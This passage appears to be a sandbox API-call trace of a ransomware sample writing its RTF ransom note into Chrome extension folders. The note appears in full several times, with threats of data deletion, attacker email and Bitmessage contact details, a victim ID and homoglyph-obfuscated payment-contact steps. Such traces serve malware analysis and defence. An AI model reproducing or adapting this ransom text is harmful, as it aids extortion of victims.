\r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.646] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x23698d8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x16Ùv#Q\x17ß÷\x1c,\x8eg»`Æ;ø\x89÷\x03%|…s¾", lpUsedDefaultChar=0x0) returned 8717 [0271.646] WriteFile (in: hFile=0x2ec, lpBuffer=0x23698d8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x23698d8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0271.647] CloseHandle (hObject=0x2ec) returned 1 [0271.647] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\#readme_eman#.rtf")) returned 0xffffffff [0271.647] GetLastError () returned 0x2 [0271.647] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0271.648] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES 